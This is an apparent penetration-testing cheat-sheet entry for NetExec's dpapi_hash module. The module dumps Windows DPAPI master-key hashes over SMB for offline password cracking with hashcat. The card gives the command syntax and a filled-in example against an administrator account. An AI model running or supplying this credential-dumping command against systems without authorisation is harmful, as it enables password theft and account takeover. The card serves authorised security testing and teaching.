NetExec dpapi_hash Module

Extract DPAPI master-key hashes for offline cracking with hashcat (mode 15300 for v1 / 15900 for v2). Lighter than full DPAPI decryption — drops just the encrypted key blobs and metadata so you can crack the user's password offline if you only have a low-priv shell. Requires local admin or the target user's hive access.

Tool
nxc
Category
Credential Attacks / Hash Dumping
Platform
linux
Requires
password
Protocols
SMB

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

nxc smb <target> -u '<user>' -p '<password>' -M dpapi_hash

Examples

nxc smb 10.10.10.10 -u administrator -p 'Password123!' -M dpapi_hash

Tags

netexec nxc dpapi hashcat offline-cracking

References